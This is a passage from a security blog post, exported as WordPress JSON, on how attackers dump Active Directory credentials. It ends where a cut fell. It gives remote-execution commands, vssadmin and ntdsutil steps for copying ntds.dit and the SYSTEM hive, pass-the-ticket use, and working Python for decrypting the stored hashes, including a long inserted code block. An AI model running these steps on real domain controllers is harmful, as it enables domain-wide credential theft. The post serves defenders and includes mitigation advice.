{"id":2398,"date":"2016-01-03T11:13:14","date_gmt":"2016-01-03T16:13:14","guid":{"rendered":"https:\/\/adsecurity.org\/?p=2398"},"modified":"2016-05-06T10:40:03","modified_gmt":"2016-05-06T14:40:03","slug":"how-attackers-dump-active-directory-database-credentials","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=2398","title":{"rendered":"How Attackers Dump Active Directory Database Credentials"},"content":{"rendered":"<p>I previously posted some information on dumping AD database credentials before in a couple of posts: &#8220;<a href=\"https:\/\/adsecurity.org\/?p=451\">How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller<\/a>&#8221; and &#8220;<a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a>&#8220;.<\/p>\n<p>This post covers many different ways that an attacker can dump credentials from Active Directory, both locally on the DC and remotely. Some of this information <a href=\"https:\/\/adsecurity.org\/?page_id=1352\">I spoke about at several security conferences in 2015 (BSides, Shakacon, Black Hat, DEF CON, &amp; DerbyCon)<\/a>.<\/p>\n<p>The primary techniques for dumping credentials from Active Directory involve <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">interacting with LSASS on a live DC<\/a>, grabbing a copy of the AD datafile (ntds.dit), or <a href=\"https:\/\/adsecurity.org\/?p=1729\">tricking a Domain Controller into replicating password data to the attacker<\/a> (&#8220;I&#8217;m a Domain Controller!&#8221;).<br \/>\nThe methods covered here require elevated rights since they involve connecting to the Domain Controller to dump credentials.<br \/>\nThey are:<\/p>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#CreateIFM\">Grabbing the ntds.dit file locally on the DC using NTDSUtil&#8217;s Create IFM<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#WMIVSS\">Pulling the ntds.dit remotely using VSS shadow 
copy<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeNinjaCopy\">Pulling the ntds.dit remotely using PowerSploit&#8217;s Invoke-NinjaCopy (requires PowerShell remoting to be enabled on the target DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#MimikatzLocal\">Dumping Active Directory credentials locally using Mimikatz (on the DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeMimikatzLocal\">Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeMimikatzRemote\">Dumping Active Directory credentials remotely using Invoke-Mimikatz.<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#MimikatzDCSync\">Dumping Active Directory credentials remotely using Mimikatz&#8217;s DCSync.<\/a><\/li>\n<\/ul>\n<p>Note that if a copy of the Active Directory database (ntds.dit) is discovered, the attacker <a href=\"https:\/\/adsecurity.org\/?p=2362\">could dump credentials from it without elevated rights<\/a> (given the matching SYSTEM hive).<br \/>\nThe last topic on this page shows how to extract credentials from a captured ntds.dit file (together with an export of the SYSTEM registry hive, which holds the boot key needed to decrypt it).<\/p>\n<p><strong>Remote Code Execution Options<br \/>\n<\/strong><\/p>\n<p>There are several different ways to execute commands remotely on a Domain Controller, assuming they are executed with the appropriate rights. 
The most reliable remote execution methods use either PowerShell Remoting (over WinRM) or WMI; all of them need an account with admin rights on the DC (or a Kerberos ticket for one, as shown below).<\/p>\n<ul>\n<li><b>WMI<\/b><br \/>\n<i>wmic \/node:COMPUTER \/user:DOMAIN\\USER \/password:PASSWORD process call create &#8220;COMMAND&#8221;<\/i><\/li>\n<li><b>PowerShell (WMI)<\/b><br \/>\n<i>Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $COMMAND -ComputerName $COMPUTER -Credential $CRED<\/i><\/li>\n<li><b>WinRM<\/b><br \/>\n<i>winrs -r:COMPUTER COMMAND<\/i><\/li>\n<li><b>PowerShell Remoting<\/b><br \/>\n<i>Invoke-Command -ComputerName $COMPUTER -ScriptBlock { $COMMAND }<\/i><br \/>\n<i>New-PSSession -Name PSCOMPUTER -ComputerName $COMPUTER; Enter-PSSession -Name PSCOMPUTER<\/i><\/li>\n<\/ul>\n<p><!--more--><\/p>\n<p><strong><br \/>\nThe Active Directory Database (ntds.dit)<\/strong><\/p>\n<p>The Active Directory domain database is stored in the <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc961761.aspx\">ntds.dit file<\/a> (c:\\Windows\\NTDS by default, but often on a different logical drive). The database is an <a href=\"https:\/\/en.wikipedia.org\/wiki\/Extensible_Storage_Engine\">Extensible Storage Engine (ESE)<\/a> database (ESE is the &#8220;Jet Blue&#8221; member of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Microsoft_Jet_Database_Engine\">Jet database engine<\/a> family); ESE provides the storage and indexing, and its indexes are what let object attributes be located quickly. ESE is a transactional engine with <a href=\"https:\/\/en.wikipedia.org\/wiki\/ACID\">ACID<\/a> (Atomic, Consistent, Isolated, and Durable) guarantees: all operations in a transaction complete or none do. 
The AD ESE database is very fast and reliable.<\/p>\n<p><img decoding=\"async\" id=\"28ea3c89-173b-4044-a30a-4b9b0b816163\" title=\"Data Store Architecture\" src=\"https:\/\/i-technet.sec.s-msft.com\/dynimg\/IC195573.gif\" alt=\"Data Store Architecture\" \/><\/p>\n<p>Note: Microsoft also uses ESE for Exchange mailbox databases.<\/p>\n<p>Active Directory <a href=\"http:\/\/blogs.technet.com\/b\/ad\/archive\/2008\/07\/11\/loading-the-active-directory-database-into-ram.aspx\">loads parts of the ntds.dit file into memory<\/a> inside the protected LSASS process (which is why local credential dumping on a DC, covered below, goes through LSASS). Caching follows an LRU-K policy, so the most frequently accessed pages stay resident and repeat reads are served from RAM. Database changes are made in memory, written to the transaction log, and lazily committed to the database file later; the checkpoint file (edb.chk) records which logged transactions have already been written to the database.<\/p>\n<p>The &#8220;<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc772829(v=ws.10).aspx\">version store<\/a>&#8221; holds a copy of a record&#8217;s prior version while it is being read, so updates can proceed without changing what the reader sees (ESE&#8217;s transactional view). Once the read operation completes, that instance in the version store is released.<\/p>\n<p>While Active Directory consists of <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc961591.aspx\">three directory partitions, Domain, Configuration, and Schema<\/a>, this is simply an abstracted view of the database data. 
<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc772829(v=ws.10).aspx\">The ntds.dit file consists of three main tables: Data Table, Link Table, and the SD Table<\/a>.<\/p>\n<blockquote>\n<h5 class=\"subHeading\">Data Table<\/h5>\n<div class=\"subSection\">\n<p>The data table contains all the information in the Active\u00a0Directory data store: users, groups, application-specific data, and any other data that is stored in Active Directory after its installation. The data table can be thought of as having rows (each representing an instance of an object, such as a user) and columns (each representing an attribute in the schema, such as <strong>GivenName<\/strong>). For each attribute in the schema, the table contains a column, called a field. Field sizes can be fixed or variable. Fixed-size fields contain an integer or long integer as the data type. Variable-size fields typically hold string types, for example, Unicode strings. The database allocates only as much space as a variable-size field needs: 16\u00a0bits for a 1-character Unicode string, 160\u00a0bits for a 10-character Unicode string, and so on.<\/p>\n<p>The database space that is used to store an object depends on the number of attributes for which values are set and the size of the values. For example, if the administrator creates two user objects (User1 and User2), sets only the minimum attributes on them, and then later adds a 10-character description to User2, the User2 space is approximately 80\u00a0bytes bigger than the User1 space (20\u00a0bytes for the 10\u00a0characters, plus metadata on the newly generated attribute).<\/p>\n<p>Database records cannot span database pages; therefore, each object is limited to 8\u00a0kilobytes (KB). However, some attribute values of an object do not count fully against this limit. Long, variable-length values can be stored on a different page than the object record, leaving behind only a 9-byte reference. 
In this way, an object and all its attribute values can be much larger than 8\u00a0KB.<\/p>\n<\/div>\n<h5 class=\"subHeading\">Link Table<\/h5>\n<div class=\"subSection\">\n<p>The link table contains data that represents linked attributes, which contain values that refer to other objects in Active\u00a0Directory. An example is the <strong>MemberOf<\/strong> attribute on a user object, which contains values that reference groups to which the user belongs. The link table is much smaller than the data table.<\/p>\n<\/div>\n<h5 class=\"subHeading\">SD Table<\/h5>\n<div class=\"subSection\">\n<p>The SD Table contains data that represents inherited security descriptors for each object. With the introduction of the SD table in Windows\u00a0Server\u00a02003 or later, inherited security descriptors no longer have to be duplicated on each object that inherits security descriptors. Instead, inherited security descriptors are stored in the SD table and linked to the appropriate objects.<\/p>\n<\/div>\n<\/blockquote>\n<p>&nbsp;<\/p>\n<p><strong>Password hash encryption used in Active Directory<\/strong><\/p>\n<p>The definitive work on this seems to be the <a href=\"http:\/\/www.ntdsxtract.com\/downloads\/ActiveDirectoryOfflineHashDumpAndForensics.pdf\">whitepaper &#8220;Active Directory Offline Hash Dump and Forensic Analysis&#8221; by Csaba Barta<\/a> (csaba.barta@gmail.com), July 2011. The &#8220;previous list&#8221; the excerpt refers to is the attribute table in the whitepaper itself, not anything on this page.<\/p>\n<blockquote><p>Note, that in the previous list there are numerous fields that are described as encrypted. The purpose of this encryption is to provide protection against offline data extraction.<\/p>\n<p>The solution introduced by Microsoft in order to provide this protection is complex and composed of 3 layers of encryption of which 2 layers use RC4 and the third layer uses DES.<\/p>\n<p>In order to decrypt a hash stored in NTDS.DIT the following steps are necessary:<\/p>\n<p>1. decrypt the PEK (Password Encryption Key) with bootkey (RC4 &#8211; layer 1)<br \/>\n2. 
hash decryption first round (with PEK and RC4 &#8211; layer 2)<br \/>\n3. hash decryption second round (DES &#8211; layer 3)<\/p>\n<p><strong>Password Encryption Key<\/strong><br \/>\nThe PEK or Password Encryption Key is used to encrypt data stored in NTDS.DIT. This key is the same across the whole domain, which means that it is the same on all the domain controllers. The PEK itself is also stored in the NTDS.DIT in an encrypted form. In order to decrypt it one will need the registry (the SYSTEM hive) from the same domain controller where the NTDS.DIT file was obtained. This is because the PEK is encrypted with the BOOTKEY which is different on all domain controllers (and in fact on all computers in the domain).<\/p>\n<p>In order to decrypt the PEK one will have to obtain the ATTk590689 field from the NTDS.DIT. As it was mentioned all the objects stored in the database will have this field. In order to determine which one is needed one has to check whether the value is null or not.<\/p>\n<p>The length of the value is 76 bytes (it is stored as binary data). The structure of the value is the following:<br \/>\nheader (8 bytes) | key material for RC4 (16 bytes) | encrypted PEK (52 bytes)<\/p>\n<p>After decryption the value of the decrypted PEK can also be divided into 2 parts. One will have to skip the first 36 bytes (so the length of the actual PEK key is 16 bytes).<\/p>\n<p>Here is the python algorithm that can be used to decrypt the PEK key after one has obtained the bootkey (bootkey can be collected from the SYSTEM registry hive and the method is well documented &#8211; http:\/\/moyix.blogspot.com\/2008\/02\/syskey-and-sam.html):<br \/>\n<em>from Crypto.Hash import MD5<br \/>\nfrom Crypto.Cipher import ARC4<br \/>\n<br \/>\ndef decrypt_pek(bootkey, enc_pek):&nbsp;&nbsp;# enc_pek: the ATTk590689 value with its 8-byte header removed<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;md5 = MD5.new()<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;md5.update(bootkey)<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;for i in range(1000):<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;md5.update(enc_pek[0:16])<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;rc4_key = md5.digest()<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;rc4 = ARC4.new(rc4_key)<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;pek = rc4.encrypt(enc_pek[16:])<br \/>\n&nbsp;&nbsp;&nbsp;&nbsp;return pek[36:]<\/em><\/p>\n<p>As one can see there is an MD5 hashing part of the decryption with 1000 rounds. 
This is for making a brute-force attack against the key more time consuming.<\/p>\n<p><strong>Password Hash Decryption<\/strong><br \/>\nNow that the PEK is decrypted the next task is to decrypt the hashes stored in the ATTk589879 (encrypted LM hash) and ATTk589914 (encrypted NT hash) attributes of user objects.<\/p>\n<p>The first step is to remove the RC4 encryption layer. During this the PEK key and the first 16 bytes of the encrypted hash are used as key material for the RC4 cypher. Below is the structure of the 40 bytes long encrypted hash value stored in the NTDS.DIT database.<br \/>\nheader (8 bytes) | key material for RC4 (16 bytes) | encrypted hash (16 bytes)<\/p>\n<p>The algorithm to remove the RC4 encryption layer is the following:<br \/>\n<em>md5 = MD5.new()<br \/>\nmd5.update(pek)<br \/>\nmd5.update(enc_hash[0:16])<br \/>\nrc4_key = md5.digest()<br \/>\nrc4 = ARC4.new(rc4_key)<br \/>\ndenc_hash = rc4.encrypt(enc_hash[16:])<\/em><\/p>\n<p>The final step is to remove the DES encryption layer which is in fact very similar to the so called \u201cstandard\u201d SYSKEY encryption used in case of password hashes stored in the registry (details of the algorithm can be found here &#8211; http:\/\/moyix.blogspot.com\/2008\/02\/syskey-and-sam.html).<\/p>\n<p>Below is the last part of the algorithm:<br \/>\n<em>from Crypto.Cipher import DES<br \/>\n<br \/>\n(des_k1, des_k2) = sid_to_key(rid)<br \/>\nd1 = DES.new(des_k1, DES.MODE_ECB)<br \/>\nd2 = DES.new(des_k2, DES.MODE_ECB)<br \/>\nhash = d1.decrypt(denc_hash[:8]) + d2.decrypt(denc_hash[8:])<\/em><\/p>\n<p>Notice, that it is essential to have the SID of the user in order to determine the RID and to compute the keys used for DES.<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>The best (and really, only) mitigation is to prevent attackers from gaining access to a Domain Controller and associated files. 
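<\/p>\n<p>For a defender, the point of the whitepaper excerpt above is how little protection the three layers give once ntds.dit and the matching SYSTEM hive have left the DC: every key is derivable from those two files plus the user&#8217;s RID, which is public. The following Python carries the whitepaper&#8217;s steps through end to end as a round trip (build the on-disk blobs for a known PEK, recover it, then strip the RC4 layer from a hash and derive the RID-based DES keys). It is an added example, not Barta&#8217;s code or this post&#8217;s; the boot key, PEK, key material and hash bytes are constructed values, MD5 and RC4 come from the standard library and a hand-written routine, and only the final DES-ECB step assumes pycryptodome&#8217;s Crypto.Cipher.DES is installed.<\/p>

```python
import hashlib

def rc4(key: bytes, data: bytes) -> bytes:
    '''Plain RC4 (KSA + PRGA); symmetric, so it both encrypts and decrypts.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def pek_rc4_key(bootkey: bytes, key_material: bytes) -> bytes:
    '''Layer 1 key: MD5 over the boot key followed by 1000 copies of the key material.'''
    md5 = hashlib.md5(bootkey)
    for _ in range(1000):
        md5.update(key_material)
    return md5.digest()

def decrypt_pek(bootkey: bytes, pek_blob: bytes) -> bytes:
    '''pek_blob is the 76-byte ATTk590689 value: 8-byte header, 16-byte RC4 key material,
    52-byte encrypted PEK. (The whitepaper code starts at the key material, i.e. header
    already stripped.) The real PEK is the last 16 of the 52 decrypted bytes.'''
    key_material, encrypted = pek_blob[8:24], pek_blob[24:76]
    return rc4(pek_rc4_key(bootkey, key_material), encrypted)[36:]

def hash_rc4_key(pek: bytes, key_material: bytes) -> bytes:
    '''Layer 2 key: a single MD5 over PEK || key material (no 1000 rounds here).'''
    return hashlib.md5(pek + key_material).digest()

def remove_rc4_layer(pek: bytes, enc_hash: bytes) -> bytes:
    '''enc_hash is the 40-byte ATTk589914 / ATTk589879 value: 8-byte header, 16-byte key
    material, 16-byte ciphertext. The output still carries the DES layer.'''
    key_material, encrypted = enc_hash[8:24], enc_hash[24:40]
    return rc4(hash_rc4_key(pek, key_material), encrypted)

def _str_to_key(s: bytes) -> bytes:
    '''Spread 7 bytes over 8 DES key bytes (7 bits each) and set odd parity in bit 0.'''
    k = [s[0] >> 1,
         ((s[0] & 0x01) << 6) | (s[1] >> 2),
         ((s[1] & 0x03) << 5) | (s[2] >> 3),
         ((s[2] & 0x07) << 4) | (s[3] >> 4),
         ((s[3] & 0x0F) << 3) | (s[4] >> 5),
         ((s[4] & 0x1F) << 2) | (s[5] >> 6),
         ((s[5] & 0x3F) << 1) | (s[6] >> 7),
         s[6] & 0x7F]
    out = bytearray()
    for b in k:
        b <<= 1
        if bin(b).count('1') % 2 == 0:   # DES ignores the parity bit, but set it anyway
            b |= 1
        out.append(b)
    return bytes(out)

def sid_to_key(rid: int):
    '''Layer 3 keys: two DES keys built from the little-endian RID, as for SYSKEY SAM hashes.'''
    r = rid.to_bytes(4, 'little')
    s1 = bytes([r[0], r[1], r[2], r[3], r[0], r[1], r[2]])
    s2 = bytes([r[3], r[0], r[1], r[2], r[3], r[0], r[1]])
    return _str_to_key(s1), _str_to_key(s2)

def remove_des_layer(denc_hash: bytes, rid: int) -> bytes:
    '''Layer 3: DES-ECB decrypt each 8-byte half with its own RID-derived key.
    Assumes pycryptodome is installed; the DES primitive is not re-implemented here.'''
    from Crypto.Cipher import DES
    k1, k2 = sid_to_key(rid)
    return (DES.new(k1, DES.MODE_ECB).decrypt(denc_hash[:8]) +
            DES.new(k2, DES.MODE_ECB).decrypt(denc_hash[8:]))

# Constructed test values (hypothetical, not taken from any real DC).
BOOTKEY = bytes.fromhex('000102030405060708090a0b0c0d0e0f')
PEK = bytes.fromhex('aabbccddeeff00112233445566778899')

def build_pek_blob(bootkey: bytes, key_material: bytes, pek: bytes) -> bytes:
    '''Inverse of decrypt_pek: the 76-byte on-disk form for a known PEK (test helper).'''
    return bytes(8) + key_material + rc4(pek_rc4_key(bootkey, key_material), bytes(36) + pek)

def build_enc_hash(pek: bytes, key_material: bytes, denc_hash: bytes) -> bytes:
    '''Inverse of remove_rc4_layer: wrap a DES-layer ciphertext as ntds.dit stores it (test helper).'''
    return bytes(8) + key_material + rc4(hash_rc4_key(pek, key_material), denc_hash)

if __name__ == '__main__':
    blob = build_pek_blob(BOOTKEY, bytes(range(16)), PEK)
    assert decrypt_pek(BOOTKEY, blob) == PEK
    inner = bytes.fromhex('00112233445566778899aabbccddeeff')   # stand-in DES-layer ciphertext
    assert remove_rc4_layer(PEK, build_enc_hash(PEK, bytes(16), inner)) == inner
    k1, k2 = sid_to_key(500)
    print('DES keys for RID 500:', k1.hex(), k2.hex())
```

<p>Run as a script it checks both round trips and prints the two DES keys for RID 500. Feeding it real data means pulling ATTk590689 and ATTk589914 out of the ESE data table and the boot key out of the SYSTEM hive, which this code does not do. Note that the 16-byte RC4 key material sits in clear next to each ciphertext, so it adds no secrecy; nothing beyond the boot key, the database file and the RID is needed to reach the NT hash.<\/p>\n<p>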
Protecting admin credentials is covered in the post &#8220;<a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a>&#8221;. In practice that means limiting which accounts can log on to or run code on DCs, and alerting on the tells the techniques on this page leave behind: vssadmin or ntdsutil (IFM) execution on a DC, raw volume reads (see the Sysmon note under Invoke-NinjaCopy below), and directory replication requests from accounts that are not Domain Controllers.<\/p>\n<p><strong>\u00a0<\/strong><a id=\"WMIVSS\"><\/a><\/p>\n<h4><strong>Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting)<br \/>\n<\/strong><\/h4>\n<p>Windows has a built-in management component called <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/aa394582%28v=vs.85%29.aspx\">WMI<\/a> that enables remote execution (admin rights on the target are required). WMIC is the WMI command-line tool for executing commands on remote computers.<\/p>\n<p>Matt Graeber presented on leveraging WMI for offensive purposes at Black Hat USA 2015 (<a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\">paper<\/a>, <a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf\">slides<\/a>, and <a href=\"https:\/\/www.youtube.com\/watch?v=pqth74Uzxy4\">video<\/a>). 
Matt also spoke at DEF CON 23 (<a href=\"https:\/\/www.youtube.com\/watch?v=xBd6p-Lz3kE\">video<\/a>) with colleagues and dove further into offensive WMI capability (and again at DerbyCon &#8211; <a href=\"https:\/\/www.youtube.com\/watch?v=3UZ3Afm5hO4\">video<\/a>).<\/p>\n<p>Use WMIC (or PowerShell remoting) to run vssadmin on the DC and create a VSS snapshot (or reuse one that already exists).<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png\" rel=\"attachment wp-att-2403\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2403\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png\" alt=\"WMIC-PowerShell-Execute-VSSAdmin\" width=\"963\" height=\"129\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png 963w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-300x40.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-768x103.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-960x129.png 960w\" sizes=\"auto, (max-width: 963px) 100vw, 963px\" \/><\/a><\/p>\n<p>Once the VSS snapshot has completed, copy the ntds.dit file and the SYSTEM registry hive out of the shadow copy to the C: drive on the DC (the hive is needed because it holds the boot key that protects the hashes).<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png\" rel=\"attachment wp-att-2402\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2402\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png\" alt=\"WMIC-PowerShell-Copy-ntdsdit-file\" width=\"962\" height=\"127\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png 962w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-300x40.png 
300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-768x101.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-960x127.png 960w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/a><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png\" rel=\"attachment wp-att-2401\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2401\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png\" alt=\"WMIC-PowerShell-Copy-system-registryhive\" width=\"962\" height=\"140\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png 962w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-300x44.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-768x112.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-960x140.png 960w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/a><\/p>\n<p>After the files are in the c:\\temp folder on the DC, we copy the files to local computer.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png\" rel=\"attachment wp-att-2400\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2400\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png\" alt=\"WMIC-PowerShell-Copy-files-from-DC-to-local\" width=\"594\" height=\"29\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png 594w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local-300x15.png 300w\" 
sizes=\"auto, (max-width: 594px) 100vw, 594px\" \/><\/a><\/p>\n<p>This screenshot shows the attacker using the clear-text password discovered earlier with <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a>. What if we don\u2019t have that?<\/p>\n<p>The attacker can instead inject a Kerberos ticket for the admin account into the current logon session (pass-the-ticket) and run the same WMIC commands without \/user and \/password; WMIC authenticates with the injected ticket and the result is identical.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png\" rel=\"attachment wp-att-2404\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2404\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png\" alt=\"WMIC-PTT-Execute-VSSAdmin-02\" width=\"796\" height=\"126\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png 796w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02-300x47.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02-768x122.png 768w\" sizes=\"auto, (max-width: 796px) 100vw, 796px\" \/><\/a> <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png\" rel=\"attachment wp-att-2405\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2405\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png\" alt=\"WMIC-PTT-Execute-VSSAdmin\" width=\"770\" height=\"126\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png 770w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-300x49.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-768x126.png 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/a><\/p>\n<p>Note that <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/hh831568.aspx\">with newer versions of Windows, WMIC is deprecated<\/a>. 
PowerShell provides the same functionality with the <i>Invoke-<\/i><i>WMIMethod<\/i> <em>cmdlet<\/em>.<br \/>\n<a id=\"CreateIFM\"><\/a><\/p>\n<h4><strong>Pulling the ntds.dit locally on the DC using NTDSUTIL&#8217;s IFM Creation (VSS shadow copy)<\/strong><\/h4>\n<p>NTDSUtil is the command utility for natively working with the AD DB (ntds.dit) &amp; enables IFM set creation for DCPromo. IFM is used with DCPromo to \u201cInstall From Media\u201d so the server being promoted doesn\u2019t need to copy domain data over the network from another DC.<\/p>\n<p><em>ntdsutil &#8220;ac i ntds&#8221; &#8220;ifm&#8221; &#8220;create full c:\\temp&#8221; q q<\/em><\/p>\n<p>The IFM set is a copy of the NTDS.dit file created in the screenshot below in c:\\temp.<br \/>\nWhen creating an IFM, a VSS snapshot is taken, mounted, and the ntds.dit file and associated data is copied out of it into the target folder.<\/p>\n<p>This file may be staged on a share for promoting new DCs or it may be found on a new server that has not been promoted yet. 
This server may not be properly secured, so the IFM data, including the ntds.dit file, can be copied and the credential data extracted.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png\" rel=\"attachment wp-att-2366\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2366\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png\" alt=\"NTDSUtil-CreateIFM\" width=\"634\" height=\"313\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png 634w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM-300x148.png 300w\" sizes=\"auto, (max-width: 634px) 100vw, 634px\" \/><\/a><\/p>\n<p><em><strong>This command can also be executed remotely via WMI or PowerShell.<\/strong><\/em><\/p>\n<p>&nbsp;<a id=\"InvokeNinjaCopy\"><\/a><\/p>\n<h4><strong>Pulling the ntds.dit remotely using <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit<\/a>&#8217;s Invoke-NinjaCopy (requires PowerShell remoting to be enabled on the target DC).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-NinjaCopy.ps1\">Invoke-NinjaCopy<\/a> is a PowerShell function that copies a file off a remote computer over PowerShell remoting, even a file that is locked open, because it reads the raw NTFS volume rather than opening the file (PowerShell remoting has to be enabled on the target DC).<\/p>\n<p><a 